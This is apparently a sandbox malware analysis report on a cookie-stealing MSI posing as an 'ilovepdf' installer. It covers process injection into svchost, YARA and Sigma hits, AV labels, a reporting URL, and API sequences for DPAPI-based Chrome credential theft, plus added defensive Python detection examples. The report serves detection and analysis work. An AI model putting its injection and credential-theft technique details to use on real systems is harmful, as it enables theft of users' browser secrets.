
Windows Analysis Report 6rfyiAq0nM

Overview

General Information

Sample Name: 6rfyiAq0nM (renamed file extension from none to msi)
Analysis ID: 508222
MD5: 623673851fbb205eb0d1003cb892d4d6
SHA1: c541b4e10541bb0a6565ba8cc6b64d2480ef4437
SHA256: 71a98e982a9dde0ffcf9a46554b7abaf947ac4c33f3a3b35df1a58b0064d0704
Tags: msi

Detection

Cookie Stealer
Score: 74
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Cookie Stealer
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Allocates memory in foreign processes
Sigma detected: Suspicious Svchost Process
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to compare user and computer (likely to detect sandboxes)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to infect the boot sector
Contains functionality to steal Chrome passwords or cookies
Modifies the context of a thread in another process (thread injection)
Contains functionality to inject threads in other processes
Sets debug register (to hijack the execution of another thread)
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to enumerate running services
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains functionality to retrieve information about pressed keystrokes
Checks for available system drives (often done to infect USB drives)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Contains functionality to clear windows event logs (to hide its activities)
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 6980 cmdline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi' MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 7056 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • MSIFBC3.tmp (PID: 4928 cmdline: C:\Windows\Installer\MSIFBC3.tmp MD5: B6D7559D31D4FF2D02338DF9CEF2FBD8)
      • MSIFBC3.tmp (PID: 6292 cmdline: 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp' MD5: D73DDB8F6B777CC6411FD3CA254F3DEC)
        • rundll32.exe (PID: 5336 cmdline: 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • svchost.exe (PID: 2968 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: 32569E403279B3FD2EDB7EBD036273FA)
            • svchost.exe (PID: 6944 cmdline: C:\Windows\system32\svchost.exe -k SystemNetworkService MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 6212 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 996 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 256 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2320 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2188 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1512 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1124 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2468 cmdline: c:\windows\system32\svchost.exe -k netsvcs MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 664 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2948 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1452 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1868 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1340 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 3444 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1188 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 5104 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
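The tree above is the whole story of this sample in one picture: a 32-bit Inno Setup installer (MSIFBC3.tmp, unpacked into is-OOL1B.tmp) calls rundll32.exe on a DLL it dropped under Program Files (x86)\ilovepdf, and that rundll32 then spawns eighteen svchost.exe processes whose command lines imitate real service hosts (-k netsvcs -p -s <service>). Service hosts are normally children of services.exe, which is why the Sigma rule fires; note also that the Sigma match records the parent as C:\Windows\SysWOW64\rundll32.exe even though the command line says system32 (WoW64 file-system redirection), and that the image name is case-mangled (rUNdLl32.Exe). The following is an added example, not part of the Joe Sandbox report: it replays the tree as simplified process-creation records (a constructed stand-in for Sysmon Event ID 1 fields) and runs three checks against them. The allow-lists are abbreviated assumptions of this example; the real Sigma rule filters a longer set of parents. Parents of the two top-level msiexec.exe processes are not shown in the report and are recorded as unknown.

```python
# Added example: replays the report's Process Tree as constructed process-creation
# records and applies hunting checks to them. Not part of the report.
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_pid: int      # 0 = parent not shown in the report
    parent_image: str


MSIEXEC = r"C:\Windows\System32\msiexec.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"
# The Sigma match records the parent as the SysWOW64 copy: the 32-bit installer's
# "system32\rUNdLl32.Exe" was redirected by WoW64.
RUNDLL32_WOW64 = r"C:\Windows\SysWOW64\rundll32.exe"
INSTALLER_TMP = r"C:\Windows\Installer\MSIFBC3.tmp"
INSTALLER_TMP2 = r"C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp"

# (pid, command-line tail) of the svchost.exe processes listed directly under PID 5336.
SVCHOST_UNDER_RUNDLL32 = [
    (2968, "-k netsvcs -p -s Appinfo"), (6212, "-k netsvcs -p -s BITS"),
    (996, "-k netsvcs -p -s gpsvc"), (256, "-k netsvcs -p -s IKEEXT"),
    (2320, "-k netsvcs -p -s iphlpsvc"), (2188, "-k netsvcs -p -s LanmanServer"),
    (1512, "-k netsvcs -p -s lfsvc"), (1124, "-k netsvcs -p -s ProfSvc"),
    (2468, "-k netsvcs"), (664, "-k netsvcs -p -s Schedule"),
    (2948, "-k netsvcs -p -s seclogon"), (1452, "-k netsvcs -p -s SENS"),
    (1868, "-k netsvcs -p -s ShellHWDetection"), (1340, "-k netsvcs -p -s Themes"),
    (3444, "-k netsvcs -p -s TokenBroker"), (1188, "-k netsvcs -p -s UserManager"),
    (5104, "-k netsvcs -p"),
]

EVENTS = [
    ProcEvent(6980, MSIEXEC, f"'{MSIEXEC}' /i 'C:\\Users\\user\\Desktop\\6rfyiAq0nM.msi'", 0, ""),
    ProcEvent(7056, MSIEXEC, r"C:\Windows\system32\msiexec.exe /V", 0, ""),
    ProcEvent(4928, INSTALLER_TMP, INSTALLER_TMP, 7056, MSIEXEC),
    ProcEvent(6292, INSTALLER_TMP2,
              f"'{INSTALLER_TMP2}' /SL5='$9025C,6374824,780800,{INSTALLER_TMP}'", 4928, INSTALLER_TMP),
    ProcEvent(5336, RUNDLL32_WOW64,
              r"'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global",
              6292, INSTALLER_TMP2),
    ProcEvent(6944, SVCHOST, f"{SVCHOST} -k SystemNetworkService", 2968, SVCHOST),
] + [ProcEvent(pid, SVCHOST, f"{SVCHOST} {tail}", 5336, RUNDLL32_WOW64)
     for pid, tail in SVCHOST_UNDER_RUNDLL32]


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


# Abbreviated allow-lists (assumption of this example, not the Sigma rule's full filter).
LEGIT_SVCHOST_PARENTS = {"services.exe", "svchost.exe"}
SERVICE_LINEAGE = {"services.exe", "wininit.exe", "svchost.exe"}


def svchost_with_odd_parent(events):
    """Sigma 'Suspicious Svchost Process' in its simplest form: svchost.exe whose
    direct parent is not an allow-listed process. Misses PID 6944 (parent is svchost)."""
    return sorted(e.pid for e in events
                  if _name(e.image) == "svchost.exe"
                  and _name(e.parent_image) not in LEGIT_SVCHOST_PARENTS)


def lineage(events, pid):
    """Image names from pid up to the highest ancestor visible in the events."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_name(by_pid[pid].image))
        pid = by_pid[pid].parent_pid
    return chain


def svchost_with_foreign_ancestor(events):
    """Generalisation over the whole ancestry: catches the nested host PID 6944 too."""
    return sorted(e.pid for e in events
                  if _name(e.image) == "svchost.exe"
                  and any(n not in SERVICE_LINEAGE for n in lineage(events, e.pid)[1:]))


# rundll32 "'<dll>',<export>" as the sandbox prints it (single quotes).
DLL_ARG = re.compile(r"'([^']+\.dll)'\s*,\s*(\w+)", re.IGNORECASE)


def rundll32_outside_windows(events):
    """rundll32.exe invocations whose DLL lives outside C:\\Windows, with the export called."""
    hits = []
    for e in events:
        if _name(e.image) != "rundll32.exe":
            continue
        m = DLL_ARG.search(e.cmdline)
        if m and not m.group(1).lower().startswith("c:\\windows\\"):
            hits.append((e.pid, m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    print("svchost with odd parent:", svchost_with_odd_parent(EVENTS))
    print("svchost with foreign ancestor:", svchost_with_foreign_ancestor(EVENTS))
    print("rundll32 loading non-Windows DLL:", rundll32_outside_windows(EVENTS))
```

The direct-parent check flags the 17 hosts spawned by rundll32 and misses the one spawned by an already-injected svchost; walking the full lineage catches all 18. In production the same logic runs over Sysmon or 4688 telemetry, where the parent image is what the kernel recorded, not what the command line claims.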

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\ilovepdf\is-93C0J.tmp | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0xed44a:$s1: \xAE\xB2\xB2\xB6\xFC\xE9\xE9

Memory Dumps

Source | Rule | Description | Author | Strings
00000014.00000003.340502864.000001D91AA60000.00000004.00000001.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000015.00000003.343737038.000002F2C5B90000.00000004.00000001.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000001E.00000003.383962907.000001BE5C730000.00000004.00000001.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000022.00000000.397199381.00000202B28F0000.00000040.00000001.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x6646e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000001D.00000003.379846771.0000022F12180000.00000004.00000001.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
Truncated; the full report lists 65 entries.

Unpacked PEs

Source | Rule | Description | Author | Strings
27.2.svchost.exe.2743a320000.0.unpack | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
34.2.svchost.exe.202b28f0000.0.unpack | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
20.2.svchost.exe.1d91aad0000.0.unpack | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
24.2.svchost.exe.1dc51fb0000.0.unpack | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
37.2.svchost.exe.1afba170000.0.unpack | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
Truncated; the full report lists 69 entries.
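Both YARA hits above are single-byte XOR: the $s1 bytes of SUSP_XORed_URL_in_EXE are "http://" under key 0xC6, and the $xo1 bytes of SUSP_XORed_MSDOS_Stub_Message are "This program cannot be run in DOS mode" under key 0x4D. The second key is ASCII "M", so a PE encoded with it starts with a zero byte where "MZ" would be, which is one reason plain-text PE carving misses it. The identical match offset (0x64e6e) across the svchost.exe memory dumps and unpacked regions shows the same injected payload image, carrying an XOR-encoded embedded PE, in every service host. The following is an added example, not part of the report or of the rules it cites: it recovers the key from each matched string and then generalises to scanning an arbitrary blob for any single-byte-XORed copy of a known plaintext, which is the hunting technique these rules implement. The BLOB is constructed here for the demonstration; the C2 URL inside it is invented.

```python
# Added example: single-byte XOR key recovery and known-plaintext scanning,
# applied to the two YARA string matches printed in the report above.

# The matched byte strings exactly as the report prints them.
XORED_URL_HIT = b"\xAE\xB2\xB2\xB6\xFC\xE9\xE9"                          # $s1, SUSP_XORed_URL_in_EXE
XORED_STUB_HIT = b'\x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")('  # $xo1, SUSP_XORed_MSDOS_Stub_Message

KNOWN_URL_PREFIX = b"http://"
KNOWN_DOS_STUB = b"This program cannot be run in DOS mode"


def single_byte_key(cipher: bytes, known: bytes):
    """Return k such that cipher[i] ^ k == known[i] for every i, or None if no
    single key explains the whole string (multi-byte key or wrong plaintext)."""
    if not known or len(cipher) < len(known):
        return None
    keys = {c ^ p for c, p in zip(cipher, known)}
    return keys.pop() if len(keys) == 1 else None


def xor_decode(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_xored(blob: bytes, known: bytes, skip_plain: bool = True):
    """Every (offset, key) in blob where some single-byte key maps `known` onto
    the bytes at that offset. Key 0x00 is the cleartext, present in every PE's
    own header, so it is skipped unless skip_plain is False."""
    hits, n = [], len(known)
    for off in range(len(blob) - n + 1):
        key = blob[off] ^ known[0]          # candidate from the first byte only
        if skip_plain and key == 0:
            continue
        if all(blob[off + i] ^ key == known[i] for i in range(n)):
            hits.append((off, key))
    return hits


# Constructed test blob (not from the sample): padding, the stub encoded with the
# key seen in the report, a cleartext stub, then an invented URL under key 0xC6.
BLOB = (b"\x90" * 40
        + xor_decode(KNOWN_DOS_STUB, 0x4D)                      # offset 40
        + b"\x00" * 8
        + KNOWN_DOS_STUB                                         # offset 86, cleartext
        + b"\x00" * 4
        + xor_decode(b"http://c2.example/report.php", 0xC6))    # offset 128


if __name__ == "__main__":
    k_url = single_byte_key(XORED_URL_HIT, KNOWN_URL_PREFIX)
    k_stub = single_byte_key(XORED_STUB_HIT, KNOWN_DOS_STUB)
    print(f"$s1 key 0x{k_url:02X} -> {xor_decode(XORED_URL_HIT, k_url)!r}")
    print(f"$xo1 key 0x{k_stub:02X} -> {xor_decode(XORED_STUB_HIT, k_stub)!r}")
    for off, key in find_xored(BLOB, KNOWN_DOS_STUB):
        print(f"XORed DOS stub at 0x{off:x}, key 0x{key:02X}")
    for off, key in find_xored(BLOB, KNOWN_URL_PREFIX):
        print(f"XORed URL at 0x{off:x}: {xor_decode(BLOB[off:off + 40], key)!r}")
```

Once the key is known, decoding the whole region around the hit (not just the 38 matched bytes) yields the embedded PE for static analysis; a hit whose bytes do not resolve to one key is a sign of a rolling or multi-byte key, which this scanner will not find.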

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5336, ProcessCommandLine: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo, ProcessId: 2968

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: 6rfyiAq0nM.msi Virustotal: Detection: 31%
Source: 6rfyiAq0nM.msi ReversingLabs: Detection: 35%
Multi AV Scanner detection for domain / URL
Source: https://fg.mygameagend.com/report7.4.php Virustotal: Detection: 5%
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp ReversingLabs: Detection: 25%
Antivirus or Machine Learning detection for unpacked file
Source: 13.2.rundll32.exe.4eb0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 37.2.svchost.exe.1afba170000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 20.2.svchost.exe.1d91aad0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 28.0.svchost.exe.1111ac00000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 24.0.svchost.exe.1dc51fb0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 28.2.svchost.exe.1111ac00000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 24.2.svchost.exe.1dc51fb0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 37.0.svchost.exe.1afba170000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 30.2.svchost.exe.1be5cd40000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 17.0.svchost.exe.204f3380000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 27.2.svchost.exe.2743a320000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 34.2.svchost.exe.202b28f0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 16.2.svchost.exe.12e17870000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 34.0.svchost.exe.202b28f0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 19.2.svchost.exe.233426d0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 23.2.svchost.exe.28621cd0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 29.0.svchost.exe.22f12740000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 29.2.svchost.exe.22f12740000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 31.2.svchost.exe.21c23140000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 23.0.svchost.exe.28621cd0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 27.0.svchost.exe.2743a320000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 31.0.svchost.exe.21c23140000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 17.2.svchost.exe.204f3380000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 21.0.svchost.exe.2f2c5c00000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 38.0.svchost.exe.25c96c80000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 25.2.svchost.exe.2216b8b0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 30.0.svchost.exe.1be5cd40000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 22.0.svchost.exe.222cab20000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 22.2.svchost.exe.222cab20000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 14.2.svchost.exe.24b7d0d0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 19.0.svchost.exe.233426d0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 21.2.svchost.exe.2f2c5c00000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 38.2.svchost.exe.25c96c80000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 25.0.svchost.exe.2216b8b0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 14.0.svchost.exe.24b7d0d0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: 20.0.svchost.exe.1d91aad0000.0.unpack Avira: Label: TR/ATRAPS.Gen2
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E198245C0 _fread_nolock,new,ImpersonateLoggedOnUser,CryptUnprotectData,RevertToSelf,LocalFree,16_2_0000012E198245C0
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E19821320 ImpersonateLoggedOnUser,CryptUnprotectData,RevertToSelf,LocalFree,16_2_0000012E19821320
(The ImpersonateLoggedOnUser / CryptUnprotectData / RevertToSelf sequence is the pattern for decrypting data protected with another logon session's DPAPI user key, such as Chrome's cookie and password blobs, from a process that is not running as that user.)
Source: Binary string: 2"j.pdb source: is-30MA7.tmp.11.dr
Source: Binary string: .pdbYH source: is-UKPSI.tmp.11.dr
Source: C:\Windows\System32\msiexec.exe File opened: z:
Source: C:\Windows\System32\msiexec.exe File opened: x:
Source: C:\Windows\System32\msiexec.exe File opened: v:
Source: C:\Windows\System32\msiexec.exe File opened: t:
Source: C:\Windows\System32\msiexec.exe File opened: r:
Source: C:\Windows\System32\msiexec.exe File opened: p:
Source: C:\Windows\System32\msiexec.exe File opened: n:
Source: C:\Windows\System32\msiexec.exe File opened: l:
Source: C:\Windows\System32\msiexec.exe File opened: j:
Source: C:\Windows\System32\msiexec.exe File opened: h:
Source: C:\Windows\System32\msiexec.exe File opened: f:
Source: C:\Windows\System32\msiexec.exe File opened: b:
Source: C:\Windows\System32\msiexec.exe File opened: y:
Source: C:\Windows\System32\msiexec.exe File opened: w:
Source: C:\Windows\System32\msiexec.exe File opened: u:
Source: C:\Windows\System32\msiexec.exe File opened: s:
Source: C:\Windows\System32\msiexec.exe File opened: q:
Source: C:\Windows\System32\msiexec.exe File opened: o:
Source: C:\Windows\System32\msiexec.exe File opened: m:
Source: C:\Windows\System32\msiexec.exe File opened: k:
Source: C:\Windows\System32\msiexec.exe File opened: i:
Source: C:\Windows\System32\msiexec.exe File opened: g:
Source: C:\Windows\System32\msiexec.exe File opened: e:
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File opened: c:
Source: C:\Windows\System32\msiexec.exe File opened: a:
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC4560 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW,13_2_04EC4560
Source: C:\Windows\Installer\MSIFBC3.tmp Code function: 10_2_0040AEF4 FindFirstFileW,FindClose,10_2_0040AEF4
Source: C:\Windows\Installer\MSIFBC3.tmp Code function: 10_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,10_2_0040A928
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Code function: 11_2_0040E6A0 FindFirstFileW,FindClose,11_2_0040E6A0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Code function: 11_2_0060BC10 FindFirstFileW,GetLastError,11_2_0060BC10
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Code function: 11_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_0040E0D4
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Code function: 11_2_006B76A0 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,11_2_006B76A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB4C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,13_2_04EB4C20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB56D0 FindFirstFileW,FindClose,13_2_04EB56D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB4E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_04EB4E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB57F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,13_2_04EB57F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EE97D9 FindFirstFileExA,13_2_04EE97D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB42B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,13_2_04EB42B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB6A30 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,13_2_04EB6A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB53D0 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,std::_Xinvalid_argument,13_2_04EB53D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC7390 lstrcpyW,lstrcatW,lstrcatW,CreateDirectoryW,GetLastError,GetLastError,FindFirstFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,13_2_04EC7390
